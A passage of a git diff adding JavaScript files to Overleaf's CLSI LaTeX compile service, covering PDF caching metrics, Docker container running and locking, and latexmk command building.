hash.digest('hex') +} + +async function writePdfStream(dir, hash, buffer) { + const filename = Path.join(dir, hash) + const atomicWriteFilename = filename + '~' + try { + await fs.promises.writeFile(atomicWriteFilename, buffer) + await fs.promises.rename(atomicWriteFilename, filename) + } catch (err) { + try { + await fs.promises.unlink(atomicWriteFilename) + } catch (_) { + throw err + } + } +} + +function getMaxOverhead(compileTime) { + return Math.min( + // Adding 10s to a 40s compile time is OK. + // Adding 1s to a 3s compile time is OK. + Math.max(compileTime / 4, 1000), + // Adding 30s to a 120s compile time is not OK, limit to 10s. + Settings.pdfCachingMaxProcessingTime + ) +} + +function getDeadlineChecker(compileTime) { + const timeout = getMaxOverhead(compileTime) + + const deadline = Date.now() + timeout + let lastStage = { stage: 'start', now: Date.now() } + let completedStages = 0 + return function (stage) { + const now = Date.now() + if (now > deadline) { + throw new TimedOutError(stage, { + timeout, + completedStages, + lastStage: lastStage.stage, + diffToLastStage: now - lastStage.now, + }) + } + completedStages++ + lastStage = { stage, now } + } +} + +function promiseMapWithLimit(concurrency, array, fn) { + const limit = pLimit(concurrency) + return Promise.all(array.map(x => limit(() => fn(x)))) +} + +module.exports = { + HASH_REGEX: /^[0-9a-f]{64}$/, + update: callbackify(update), + promises: { + update, + updateSameEventLoop, + }, +} diff --git a/services/clsi/app/js/ContentCacheMetrics.js b/services/clsi/app/js/ContentCacheMetrics.js new file mode 100644 index 0000000..1e2b598 --- /dev/null +++ b/services/clsi/app/js/ContentCacheMetrics.js @@ -0,0 +1,146 @@ +const logger = require('@overleaf/logger') +const Metrics = require('./Metrics') +const os = require('node:os') + +let CACHED_LOAD = { + expires: -1, + load: [0, 0, 0], +} +function getSystemLoad() { + if (CACHED_LOAD.expires < Date.now()) { + CACHED_LOAD = { + expires: Date.now() + 10 * 1000, + load: os.loadavg(), + } + } + return CACHED_LOAD.load +} + +const ONE_MB = 1024 * 1024 + +function emitPdfStats(stats, timings, request) { + if (timings['compute-pdf-caching']) { + emitPdfCachingStats(stats, timings, request) + } else { + // How much bandwidth will the pdf incur when downloaded in full? + Metrics.summary('pdf-bandwidth', stats['pdf-size'], request.metricsOpts) + } +} + +function emitPdfCachingStats(stats, timings, request) { + if (!stats['pdf-size']) return // double check + + if (stats['pdf-caching-timed-out']) { + Metrics.inc('pdf-caching-timed-out', 1, request.metricsOpts) + } + if (timings['pdf-caching-overhead-delete-stale-hashes'] !== undefined) { + Metrics.summary( + 'pdf-caching-overhead-delete-stale-hashes', + timings['pdf-caching-overhead-delete-stale-hashes'], + request.metricsOpts + ) + } + + // How much extra time did we spent in PDF.js? + Metrics.timing( + 'compute-pdf-caching', + timings['compute-pdf-caching'], + 1, + request.metricsOpts + ) + + // How large is the overhead of hashing up-front? + const fraction = + timings.compileE2E - timings['compute-pdf-caching'] !== 0 + ? timings.compileE2E / + (timings.compileE2E - timings['compute-pdf-caching']) + : 1 + if (fraction > 1.5 && timings.compileE2E > 10 * 1000) { + logger.warn( + { + stats, + timings, + load: getSystemLoad(), + }, + 'slow pdf caching' + ) + } + Metrics.summary( + 'overhead-compute-pdf-ranges', + fraction * 100 - 100, + request.metricsOpts + ) + + // How does the hashing scale to pdf size in MB? + Metrics.timing( + 'compute-pdf-caching-relative-to-pdf-size', + timings['compute-pdf-caching'] / (stats['pdf-size'] / ONE_MB), + 1, + request.metricsOpts + ) + if (stats['pdf-caching-total-ranges-size']) { + // How does the hashing scale to total ranges size in MB? + Metrics.timing( + 'compute-pdf-caching-relative-to-total-ranges-size', + timings['compute-pdf-caching'] / + (stats['pdf-caching-total-ranges-size'] / ONE_MB), + 1, + request.metricsOpts + ) + // How fast is the hashing per range on average? + Metrics.timing( + 'compute-pdf-caching-relative-to-ranges-count', + timings['compute-pdf-caching'] / stats['pdf-caching-n-ranges'], + 1, + request.metricsOpts + ) + + // How many ranges are new? + Metrics.summary( + 'new-pdf-ranges-relative-to-total-ranges', + (stats['pdf-caching-n-new-ranges'] / stats['pdf-caching-n-ranges']) * 100, + request.metricsOpts + ) + } + + // How much content is cacheable? + Metrics.summary( + 'cacheable-ranges-to-pdf-size', + (stats['pdf-caching-total-ranges-size'] / stats['pdf-size']) * 100, + request.metricsOpts + ) + + const sizeWhenDownloadedInFull = + // All of the pdf + stats['pdf-size'] - + // These ranges are potentially cached. + stats['pdf-caching-total-ranges-size'] + + // These ranges are not cached. + stats['pdf-caching-new-ranges-size'] + + // How much bandwidth can we save when downloading the pdf in full? + Metrics.summary( + 'pdf-bandwidth-savings', + 100 - (sizeWhenDownloadedInFull / stats['pdf-size']) * 100, + request.metricsOpts + ) + + // How much bandwidth will the pdf incur when downloaded in full? + Metrics.summary( + 'pdf-bandwidth', + sizeWhenDownloadedInFull, + request.metricsOpts + ) + + // How much space do the ranges use? + // This will accumulate the ranges size over time, skipping already written ranges. + Metrics.summary( + 'pdf-ranges-disk-size', + stats['pdf-caching-new-ranges-size'] - stats['pdf-caching-reclaimed-space'], + request.metricsOpts + ) +} + +module.exports = { + emitPdfStats, +} diff --git a/services/clsi/app/js/ContentCacheWorker.js b/services/clsi/app/js/ContentCacheWorker.js new file mode 100644 index 0000000..9ecb5b1 --- /dev/null +++ b/services/clsi/app/js/ContentCacheWorker.js @@ -0,0 +1,4 @@ +const workerpool = require('workerpool') +const ContentCacheManager = require('./ContentCacheManager') + +workerpool.worker(ContentCacheManager.promises) diff --git a/services/clsi/app/js/ContentController.js b/services/clsi/app/js/ContentController.js new file mode 100644 index 0000000..96eba61 --- /dev/null +++ b/services/clsi/app/js/ContentController.js @@ -0,0 +1,24 @@ +const Path = require('node:path') +const send = require('send') +const Settings = require('@overleaf/settings') +const OutputCacheManager = require('./OutputCacheManager') + +const ONE_DAY_S = 24 * 60 * 60 +const ONE_DAY_MS = ONE_DAY_S * 1000 + +function getPdfRange(req, res, next) { + const { projectId, userId, contentId, hash } = req.params + const perUserDir = userId ? `${projectId}-${userId}` : projectId + const path = Path.join( + Settings.path.outputDir, + perUserDir, + OutputCacheManager.CONTENT_SUBDIR, + contentId, + hash + ) + res.setHeader('cache-control', `public, max-age=${ONE_DAY_S}`) + res.setHeader('expires', new Date(Date.now() + ONE_DAY_MS).toUTCString()) + send(req, path).pipe(res) +} + +module.exports = { getPdfRange } diff --git a/services/clsi/app/js/ContentTypeMapper.js b/services/clsi/app/js/ContentTypeMapper.js new file mode 100644 index 0000000..5bf0c31 --- /dev/null +++ b/services/clsi/app/js/ContentTypeMapper.js @@ -0,0 +1,38 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +let ContentTypeMapper +const Path = require('node:path') + +// here we coerce html, css and js to text/plain, +// otherwise choose correct mime type based on file extension, +// falling back to octet-stream +module.exports = ContentTypeMapper = { + map(path) { + switch (Path.extname(path)) { + case '.txt': + case '.html': + case '.js': + case '.css': + case '.svg': + return 'text/plain' + case '.csv': + return 'text/csv' + case '.pdf': + return 'application/pdf' + case '.png': + return 'image/png' + case '.jpg': + case '.jpeg': + return 'image/jpeg' + case '.tiff': + return 'image/tiff' + case '.gif': + return 'image/gif' + default: + return 'application/octet-stream' + } + }, +} diff --git a/services/clsi/app/js/DockerLockManager.js b/services/clsi/app/js/DockerLockManager.js new file mode 100644 index 0000000..97804b7 --- /dev/null +++ b/services/clsi/app/js/DockerLockManager.js @@ -0,0 +1,110 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let LockManager +const logger = require('@overleaf/logger') + +const LockState = {} // locks for docker container operations, by container name + +module.exports = LockManager = { + MAX_LOCK_HOLD_TIME: 15000, // how long we can keep a lock + MAX_LOCK_WAIT_TIME: 10000, // how long we wait for a lock + LOCK_TEST_INTERVAL: 1000, // retry time + + tryLock(key, callback) { + let lockValue + if (callback == null) { + callback = function () {} + } + const existingLock = LockState[key] + if (existingLock != null) { + // the lock is already taken, check how old it is + const lockAge = Date.now() - existingLock.created + if (lockAge < LockManager.MAX_LOCK_HOLD_TIME) { + return callback(null, false) // we didn't get the lock, bail out + } else { + logger.error( + { key, lock: existingLock, age: lockAge }, + 'taking old lock by force' + ) + } + } + // take the lock + LockState[key] = lockValue = { created: Date.now() } + return callback(null, true, lockValue) + }, + + getLock(key, callback) { + let attempt + if (callback == null) { + callback = function () {} + } + const startTime = Date.now() + return (attempt = () => + LockManager.tryLock(key, function (error, gotLock, lockValue) { + if (error != null) { + return callback(error) + } + if (gotLock) { + return callback(null, lockValue) + } else if (Date.now() - startTime > LockManager.MAX_LOCK_WAIT_TIME) { + const e = new Error('Lock timeout') + e.key = key + return callback(e) + } else { + return setTimeout(attempt, LockManager.LOCK_TEST_INTERVAL) + } + }))() + }, + + releaseLock(key, lockValue, callback) { + if (callback == null) { + callback = function () {} + } + const existingLock = LockState[key] + if (existingLock === lockValue) { + // lockValue is an object, so we can test by reference + delete LockState[key] // our lock, so we can free it + return callback() + } else if (existingLock != null) { + // lock exists but doesn't match ours + logger.error( + { key, lock: existingLock }, + 'tried to release lock taken by force' + ) + return callback() + } else { + logger.error( + { key, lock: existingLock }, + 'tried to release lock that has gone' + ) + return callback() + } + }, + + runWithLock(key, runner, callback) { + if (callback == null) { + callback = function () {} + } + return LockManager.getLock(key, function (error, lockValue) { + if (error != null) { + return callback(error) + } + return runner((error1, ...args) => + LockManager.releaseLock(key, lockValue, function (error2) { + error = error1 || error2 + if (error != null) { + return callback(error) + } + return callback(null, ...Array.from(args)) + }) + ) + }) + }, +} diff --git a/services/clsi/app/js/DockerRunner.js b/services/clsi/app/js/DockerRunner.js new file mode 100644 index 0000000..def02ea --- /dev/null +++ b/services/clsi/app/js/DockerRunner.js @@ -0,0 +1,597 @@ +const { promisify } = require('node:util') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const Docker = require('dockerode') +const dockerode = new Docker() +const crypto = require('node:crypto') +const async = require('async') +const LockManager = require('./DockerLockManager') +const Path = require('node:path') +const _ = require('lodash') + +const ONE_HOUR_IN_MS = 60 * 60 * 1000 +logger.debug('using docker runner') + +let containerMonitorTimeout +let containerMonitorInterval + +const DockerRunner = { + run( + projectId, + command, + directory, + image, + timeout, + environment, + compileGroup, + callback + ) { + command = command.map(arg => + arg.toString().replace('$COMPILE_DIR', '/compile') + ) + if (image == null) { + image = Settings.clsi.docker.image + } + + if ( + Settings.clsi.docker.allowedImages && + !Settings.clsi.docker.allowedImages.includes(image) + ) { + return callback(new Error('image not allowed')) + } + + if (Settings.texliveImageNameOveride != null) { + const img = image.split('/') + image = `${Settings.texliveImageNameOveride}/${img[2]}` + } + + if (compileGroup === 'synctex-output') { + // In: directory = '/overleaf/services/clsi/output/projectId-userId/generated-files/buildId' + // directory.split('/').slice(-3) === 'projectId-userId/generated-files/buildId' + // sandboxedCompilesHostDirOutput = '/host/output' + // Out: directory = '/host/output/projectId-userId/generated-files/buildId' + directory = Path.join( + Settings.path.sandboxedCompilesHostDirOutput, + ...directory.split('/').slice(-3) + ) + } else { + // In: directory = '/overleaf/services/clsi/compiles/projectId-userId' + // Path.basename(directory) === 'projectId-userId' + // sandboxedCompilesHostDirCompiles = '/host/compiles' + // Out: directory = '/host/compiles/projectId-userId' + directory = Path.join( + Settings.path.sandboxedCompilesHostDirCompiles, + Path.basename(directory) + ) + } + + const volumes = { [directory]: '/compile' } + if ( + compileGroup === 'synctex' || + compileGroup === 'synctex-output' || + compileGroup === 'wordcount' + ) { + volumes[directory] += ':ro' + } + + const options = DockerRunner._getContainerOptions( + command, + image, + volumes, + timeout, + environment, + compileGroup + ) + const fingerprint = DockerRunner._fingerprintContainer(options) + const name = `project-${projectId}-${fingerprint}` + options.name = name + + // logOptions = _.clone(options) + // logOptions?.HostConfig?.SecurityOpt = "secomp used, removed in logging" + logger.debug({ projectId }, 'running docker container') + DockerRunner._runAndWaitForContainer( + options, + volumes, + timeout, + (error, output) => { + if (error && error.statusCode === 500) { + logger.debug( + { err: error, projectId }, + 'error running container so destroying and retrying' + ) + DockerRunner.destroyContainer(name, null, true, error => { + if (error != null) { + return callback(error) + } + DockerRunner._runAndWaitForContainer( + options, + volumes, + timeout, + callback + ) + }) + } else { + callback(error, output) + } + } + ) + + // pass back the container name to allow it to be killed + return name + }, + + kill(containerId, callback) { + logger.debug({ containerId }, 'sending kill signal to container') + const container = dockerode.getContainer(containerId) + container.kill(error => { + if ( + error != null && + error.message != null && + error.message.match(/Cannot kill container .* is not running/) + ) { + logger.warn( + { err: error, containerId }, + 'container not running, continuing' + ) + error = null + } + if (error != null) { + logger.error({ err: error, containerId }, 'error killing container') + callback(error) + } else { + callback() + } + }) + }, + + _runAndWaitForContainer(options, volumes, timeout, _callback) { + const callback = _.once(_callback) + const { name } = options + + let streamEnded = false + let containerReturned = false + let output = {} + + function callbackIfFinished() { + if (streamEnded && containerReturned) { + callback(null, output) + } + } + + function attachStreamHandler(error, _output) { + if (error != null) { + return callback(error) + } + output = _output + streamEnded = true + callbackIfFinished() + } + + DockerRunner.startContainer( + options, + volumes, + attachStreamHandler, + (error, containerId) => { + if (error != null) { + return callback(error) + } + + DockerRunner.waitForContainer(name, timeout, (error, exitCode) => { + if (error != null) { + return callback(error) + } + if (exitCode === 137) { + // exit status from kill -9 + const err = new Error('terminated') + err.terminated = true + return callback(err) + } + if (exitCode === 1) { + // exit status from chktex + const err = new Error('exited') + err.code = exitCode + return callback(err) + } + containerReturned = true + if (options != null && options.HostConfig != null) { + options.HostConfig.SecurityOpt = null + } + logger.debug({ exitCode, options }, 'docker container has exited') + callbackIfFinished() + }) + } + ) + }, + + _getContainerOptions( + command, + image, + volumes, + timeout, + environment, + compileGroup + ) { + const timeoutInSeconds = timeout / 1000 + + const dockerVolumes = {} + for (const hostVol in volumes) { + const dockerVol = volumes[hostVol] + dockerVolumes[dockerVol] = {} + + if (volumes[hostVol].slice(-3).indexOf(':r') === -1) { + volumes[hostVol] = `${dockerVol}:rw` + } + } + + // merge settings and environment parameter + const env = {} + for (const src of [Settings.clsi.docker.env, environment || {}]) { + for (const key in src) { + const value = src[key] + env[key] = value + } + } + // set the path based on the image year + const match = image.match(/:([0-9]+)\.[0-9]+/) + const year = match ? match[1] : '2014' + env.PATH = `/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/texlive/${year}/bin/x86_64-linux/` + const options = { + Cmd: command, + Image: image, + Volumes: dockerVolumes, + WorkingDir: '/compile', + NetworkDisabled: true, + Memory: 1024 * 1024 * 1024 * 1024, // 1 Gb + User: Settings.clsi.docker.user, + Env: Object.entries(env).map(([key, value]) => `${key}=${value}`), + HostConfig: { + Binds: Object.entries(volumes).map( + ([hostVol, dockerVol]) => `${hostVol}:${dockerVol}` + ), + LogConfig: { Type: 'none', Config: {} }, + Ulimits: [ + { + Name: 'cpu', + Soft: timeoutInSeconds + 5, + Hard: timeoutInSeconds + 10, + }, + ], + CapDrop: 'ALL', + SecurityOpt: ['no-new-privileges'], + }, + } + + if (Settings.clsi.docker.seccomp_profile != null) { + options.HostConfig.SecurityOpt.push( + `seccomp=${Settings.clsi.docker.seccomp_profile}` + ) + } + + if (Settings.clsi.docker.apparmor_profile != null) { + options.HostConfig.SecurityOpt.push( + `apparmor=${Settings.clsi.docker.apparmor_profile}` + ) + } + + if (Settings.clsi.docker.runtime) { + options.HostConfig.Runtime = Settings.clsi.docker.runtime + } + + if (Settings.clsi.docker.Readonly) { + options.HostConfig.ReadonlyRootfs = true + options.HostConfig.Tmpfs = { '/tmp': 'rw,noexec,nosuid,size=65536k' } + options.Volumes['/home/tex'] = {} + } + + // Allow per-compile group overriding of individual settings + if ( + Settings.clsi.docker.compileGroupConfig && + Settings.clsi.docker.compileGroupConfig[compileGroup] + ) { + const override = Settings.clsi.docker.compileGroupConfig[compileGroup] + for (const key in override) { + _.set(options, key, override[key]) + } + } + + return options + }, + + _fingerprintContainer(containerOptions) { + // Yay, Hashing! + const json = JSON.stringify(containerOptions) + return crypto.createHash('md5').update(json).digest('hex') + }, + + startContainer(options, volumes, attachStreamHandler, callback) { + LockManager.runWithLock( + options.name, + releaseLock => + DockerRunner._startContainer( + options, + volumes, + attachStreamHandler, + releaseLock + ), + callback + ) + }, + + // Check that volumes exist and are directories + _startContainer(options, volumes, attachStreamHandler, callback) { + callback = _.once(callback) + const { name } = options + + logger.debug({ containerName: name }, 'starting container') + const container = dockerode.getContainer(name) + + function createAndStartContainer() { + dockerode.createContainer(options, (error, container) => { + if (error != null) { + return callback(error) + } + startExistingContainer() + }) + } + + function startExistingContainer() { + DockerRunner.attachToContainer( + options.name, + attachStreamHandler, + error => { + if (error != null) { + return callback(error) + } + container.start(error => { + if (error != null && error.statusCode !== 304) { + callback(error) + } else { + // already running + callback() + } + }) + } + ) + } + + container.inspect((error, stats) => { + if (error != null && error.statusCode === 404) { + createAndStartContainer() + } else if (error != null) { + logger.err( + { containerName: name, error }, + 'unable to inspect container to start' + ) + callback(error) + } else { + startExistingContainer() + } + }) + }, + + attachToContainer(containerId, attachStreamHandler, attachStartCallback) { + const container = dockerode.getContainer(containerId) + container.attach({ stdout: 1, stderr: 1, stream: 1 }, (error, stream) => { + if (error != null) { + logger.error( + { err: error, containerId }, + 'error attaching to container' + ) + return attachStartCallback(error) + } else { + attachStartCallback() + } + + logger.debug({ containerId }, 'attached to container') + + const MAX_OUTPUT = 1024 * 1024 * 2 // limit output to 2MB + function createStringOutputStream(name) { + return { + data: '', + overflowed: false, + write(data) { + if (this.overflowed) { + return + } + if (this.data.length < MAX_OUTPUT) { + this.data += data + } else { + logger.info( + { + containerId, + length: this.data.length, + maxLen: MAX_OUTPUT, + }, + `${name} exceeds max size` + ) + this.data += `(...truncated at ${MAX_OUTPUT} chars...)` + this.overflowed = true + } + }, + // kill container if too much output + // docker.containers.kill(containerId, () ->) + } + } + + const stdout = createStringOutputStream('stdout') + const stderr = createStringOutputStream('stderr') + + container.modem.demuxStream(stream, stdout, stderr) + + stream.on('error', err => + logger.error( + { err, containerId }, + 'error reading from container stream' + ) + ) + + stream.on('end', () => + attachStreamHandler(null, { stdout: stdout.data, stderr: stderr.data }) + ) + }) + }, + + waitForContainer(containerId, timeout, _callback) { + const callback = _.once(_callback) + + const container = dockerode.getContainer(containerId) + + let timedOut = false + const timeoutId = setTimeout(() => { + timedOut = true + logger.debug({ containerId }, 'timeout reached, killing container') + container.kill(err => { + logger.warn({ err, containerId }, 'failed to kill container') + }) + }, timeout) + + logger.debug({ containerId }, 'waiting for docker container') + container.wait((error, res) => { + if (error != null) { + clearTimeout(timeoutId) + logger.warn({ err: error, containerId }, 'error waiting for container') + return callback(error) + } + if (timedOut) { + logger.debug({ containerId }, 'docker container timed out') + error = new Error('container timed out') + error.timedout = true + callback(error) + } else { + clearTimeout(timeoutId) + logger.debug( + { containerId, exitCode: res.StatusCode }, + 'docker container returned' + ) + callback(null, res.StatusCode) + } + }) + }, + + destroyContainer(containerName, containerId, shouldForce, callback) { + // We want the containerName for the lock and, ideally, the + // containerId to delete. There is a bug in the docker.io module + // where if you delete by name and there is an error, it throws an + // async exception, but if you delete by id it just does a normal + // error callback. We fall back to deleting by name if no id is + // supplied. + LockManager.runWithLock( + containerName, + releaseLock => + DockerRunner._destroyContainer( + containerId || containerName, + shouldForce, + releaseLock + ), + callback + ) + }, + + _destroyContainer(containerId, shouldForce, callback) { + logger.debug({ containerId }, 'destroying docker container') + const container = dockerode.getContainer(containerId) + container.remove({ force: shouldForce === true, v: true }, error => { + if (error != null && error.statusCode === 404) { + logger.warn( + { err: error, containerId }, + 'container not found, continuing' + ) + error = null + } + if (error != null) { + logger.error({ err: error, containerId }, 'error destroying container') + } else { + logger.debug({ containerId }, 'destroyed container') + } + callback(error) + }) + }, + + // handle expiry of docker containers + + MAX_CONTAINER_AGE: Settings.clsi.docker.maxContainerAge || ONE_HOUR_IN_MS, + + examineOldContainer(container, callback) { + const name = container.Name || (container.Names && container.Names[0]) + const created = container.Created * 1000 // creation time is returned in seconds + const now = Date.now() + const age = now - created + const maxAge = DockerRunner.MAX_CONTAINER_AGE + const ttl = maxAge - age + logger.debug( + { containerName: name, created, now, age, maxAge, ttl }, + 'checking whether to destroy container' + ) + return { name, id: container.Id, ttl } + }, + + destroyOldContainers(callback) { + dockerode.listContainers({ all: true }, (error, containers) => { + if (error != null) { + return callback(error) + } + const jobs = [] + for (const container of containers) { + const { name, id, ttl } = DockerRunner.examineOldContainer(container) + if (name.slice(0, 9) === '/project-' && ttl <= 0) { + // strip the / prefix + // the LockManager uses the plain container name + const plainName = name.slice(1) + jobs.push(cb => + DockerRunner.destroyContainer(plainName, id, false, () => cb()) + ) + } + } + // Ignore errors because some containers get stuck but + // will be destroyed next time + async.series(jobs, callback) + }) + }, + + startContainerMonitor() { + logger.debug( + { maxAge: DockerRunner.MAX_CONTAINER_AGE }, + 'starting container expiry' + ) + + // guarantee only one monitor is running + DockerRunner.stopContainerMonitor() + + // randomise the start time + const randomDelay = Math.floor(Math.random() * 5 * 60 * 1000) + containerMonitorTimeout = setTimeout(() => { + containerMonitorInterval = setInterval( + () => + DockerRunner.destroyOldContainers(err => { + if (err) { + logger.error({ err }, 'failed to destroy old containers') + } + }), + ONE_HOUR_IN_MS + ) + }, randomDelay) + }, + + stopContainerMonitor() { + if (containerMonitorTimeout) { + clearTimeout(containerMonitorTimeout) + containerMonitorTimeout = undefined + } + if (containerMonitorInterval) { + clearInterval(containerMonitorInterval) + containerMonitorInterval = undefined + } + }, + + canRunSyncTeXInOutputDir() { + return Boolean(Settings.path.sandboxedCompilesHostDirOutput) + }, +} + +DockerRunner.startContainerMonitor() + +module.exports = DockerRunner +module.exports.promises = { + run: promisify(DockerRunner.run), + kill: promisify(DockerRunner.kill), +} diff --git a/services/clsi/app/js/DraftModeManager.js b/services/clsi/app/js/DraftModeManager.js new file mode 100644 index 0000000..cf8abab --- /dev/null +++ b/services/clsi/app/js/DraftModeManager.js @@ -0,0 +1,24 @@ +const fsPromises = require('node:fs/promises') +const { callbackify } = require('node:util') +const logger = require('@overleaf/logger') + +async function injectDraftMode(filename) { + const content = await fsPromises.readFile(filename, { encoding: 'utf8' }) + const modifiedContent = + '\\PassOptionsToPackage{draft}{graphicx}\\PassOptionsToPackage{draft}{graphics}' + + content + logger.debug( + { + content: content.slice(0, 1024), // \documentclass is normally v near the top + modifiedContent: modifiedContent.slice(0, 1024), + filename, + }, + 'injected draft class' + ) + await fsPromises.writeFile(filename, modifiedContent, { encoding: 'utf8' }) +} + +module.exports = { + injectDraftMode: callbackify(injectDraftMode), + promises: { injectDraftMode }, +} diff --git a/services/clsi/app/js/Errors.js b/services/clsi/app/js/Errors.js new file mode 100644 index 0000000..64c3c7b --- /dev/null +++ b/services/clsi/app/js/Errors.js @@ -0,0 +1,49 @@ +/* eslint-disable + no-proto, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +const OError = require('@overleaf/o-error') + +let Errors +function NotFoundError(message) { + const error = new Error(message) + error.name = 'NotFoundError' + error.__proto__ = NotFoundError.prototype + return error +} +NotFoundError.prototype.__proto__ = Error.prototype + +function FilesOutOfSyncError(message) { + const error = new Error(message) + error.name = 'FilesOutOfSyncError' + error.__proto__ = FilesOutOfSyncError.prototype + return error +} +FilesOutOfSyncError.prototype.__proto__ = Error.prototype + +function AlreadyCompilingError(message) { + const error = new Error(message) + error.name = 'AlreadyCompilingError' + error.__proto__ = AlreadyCompilingError.prototype + return error +} +AlreadyCompilingError.prototype.__proto__ = Error.prototype + +class QueueLimitReachedError extends OError {} +class TimedOutError extends OError {} +class NoXrefTableError extends OError {} +class TooManyCompileRequestsError extends OError {} +class InvalidParameter extends OError {} + +module.exports = Errors = { + QueueLimitReachedError, + TimedOutError, + NotFoundError, + FilesOutOfSyncError, + AlreadyCompilingError, + NoXrefTableError, + TooManyCompileRequestsError, + InvalidParameter, +} diff --git a/services/clsi/app/js/LatexRunner.js b/services/clsi/app/js/LatexRunner.js new file mode 100644 index 0000000..beefa00 --- /dev/null +++ b/services/clsi/app/js/LatexRunner.js @@ -0,0 +1,203 @@ +const Path = require('node:path') +const { promisify } = require('node:util') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const CommandRunner = require('./CommandRunner') +const fs = require('node:fs') + +const ProcessTable = {} // table of currently running jobs (pids or docker container names) + +const TIME_V_METRICS = Object.entries({ + 'cpu-percent': /Percent of CPU this job got: (\d+)/m, + 'cpu-time': /User time.*: (\d+.\d+)/m, + 'sys-time': /System time.*: (\d+.\d+)/m, +}) + +const COMPILER_FLAGS = { + latex: '-pdfdvi', + lualatex: '-lualatex', + pdflatex: '-pdf', + xelatex: '-xelatex', +} + +function runLatex(projectId, options, callback) { + const { + directory, + mainFile, + image, + environment, + flags, + compileGroup, + stopOnFirstError, + stats, + timings, + } = options + const compiler = options.compiler || 'pdflatex' + const timeout = options.timeout || 60000 // milliseconds + + logger.debug( + { + directory, + compiler, + timeout, + mainFile, + environment, + flags, + compileGroup, + stopOnFirstError, + }, + 'starting compile' + ) + + let command + try { + command = _buildLatexCommand(mainFile, { + compiler, + stopOnFirstError, + flags, + }) + } catch (err) { + return callback(err) + } + + const id = `${projectId}` // record running project under this id + + ProcessTable[id] = CommandRunner.run( + projectId, + command, + directory, + image, + timeout, + environment, + compileGroup, + function (error, output) { + delete ProcessTable[id] + if (error) { + return callback(error) + } + const runs = + output?.stderr?.match(/^Run number \d+ of .*latex/gm)?.length || 0 + const failed = output?.stdout?.match(/^Latexmk: Errors/m) != null ? 1 : 0 + // counters from latexmk output + stats['latexmk-errors'] = failed + stats['latex-runs'] = runs + stats['latex-runs-with-errors'] = failed ? runs : 0 + stats[`latex-runs-${runs}`] = 1 + stats[`latex-runs-with-errors-${runs}`] = failed ? 1 : 0 + // timing information from /usr/bin/time + const stderr = (output && output.stderr) || '' + if (stderr.includes('Command being timed:')) { + // Add metrics for runs with `$ time -v ...` + for (const [timing, matcher] of TIME_V_METRICS) { + const match = stderr.match(matcher) + if (match) { + timings[timing] = parseFloat(match[1]) + } + } + } + // record output files + _writeLogOutput(projectId, directory, output, () => { + callback(error, output) + }) + } + ) +} + +function _writeLogOutput(projectId, directory, output, callback) { + if (!output) { + return callback() + } + // internal method for writing non-empty log files + function _writeFile(file, content, cb) { + if (content && content.length > 0) { + fs.unlink(file, () => { + fs.writeFile(file, content, { flag: 'wx' }, err => { + if (err) { + // don't fail on error + logger.error({ err, projectId, file }, 'error writing log file') + } + cb() + }) + }) + } else { + cb() + } + } + // write stdout and stderr, ignoring errors + _writeFile(Path.join(directory, 'output.stdout'), output.stdout, () => { + _writeFile(Path.join(directory, 'output.stderr'), output.stderr, () => { + callback() + }) + }) +} + +function killLatex(projectId, callback) { + const id = `${projectId}` + logger.debug({ id }, 'killing running compile') + if (ProcessTable[id] == null) { + logger.warn({ id }, 'no such project to kill') + callback(null) + } else { + CommandRunner.kill(ProcessTable[id], callback) + } +} + +function _buildLatexCommand(mainFile, opts = {}) { + const command = [] + + if (Settings.clsi?.strace) { + command.push('strace', '-o', 'strace', '-ff') + } + + if (Settings.clsi?.latexmkCommandPrefix) { + command.push(...Settings.clsi.latexmkCommandPrefix) + } + + // Basic command and flags + command.push( + 'latexmk', + '-cd', + '-jobname=output', + '-auxdir=$COMPILE_DIR', + '-outdir=$COMPILE_DIR', + '-synctex=1', + '-interaction=batchmode' + ) + + // Stop on first error option + if (opts.stopOnFirstError) { + command.push('-halt-on-error') + } else { + // Run all passes despite errors + command.push('-f') + } + + // Extra flags + if (opts.flags) { + command.push(...opts.flags) + } + + // TeX Engine selection + const compilerFlag = COMPILER_FLAGS[opts.compiler] + if (compilerFlag) { + command.push(compilerFlag) + } else { + throw new Error(`unknown compiler: ${opts.compiler}`) + } + + // We want to run latexmk on the tex file which we will automatically + // generate from the Rtex/Rmd/md file. + mainFile = mainFile.replace(/\.(Rtex|md|Rmd|Rnw)$/, '.tex') + command.push(Path.join('$COMPILE_DIR', mainFile)) + + return command +} + +module.exports = { + runLatex, + killLatex, + promises: { + runLatex: promisify(runLatex), + killLatex: promisify(killLatex), + }, +} diff --git a/services/clsi/app/js/LocalCommandRunner.js b/services/clsi/app/js/LocalCommandRunner.js new file mode 100644 index 0000000..ce27473 --- /dev/null +++ b/services/clsi/app/js/LocalCommandRunner.js @@ -0,0 +1,111 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let CommandRunner +const { spawn } = require('node:child_process') +const { promisify } = require('node:util') +const _ = require('lodash') +const logger = require('@overleaf/logger') + +logger.debug('using standard command runner') + +module.exports = CommandRunner = { + run( + projectId, + command, + directory, + image, + timeout, + environment, + compileGroup, + callback + ) { + let key, value + callback = _.once(callback) + command = Array.from(command).map(arg => + arg.toString().replace('$COMPILE_DIR', directory) + ) + logger.debug({ projectId, command, directory }, 'running command') + logger.warn('timeouts and sandboxing are not enabled with CommandRunner') + + // merge environment settings + const env = {} + for (key in process.env) { + value = process.env[key] + env[key] = value + } + for (key in environment) { + value = environment[key] + env[key] = value + } + + // run command as detached process so it has its own process group (which can be killed if needed) + const proc = spawn(command[0], command.slice(1), { + cwd: directory, + 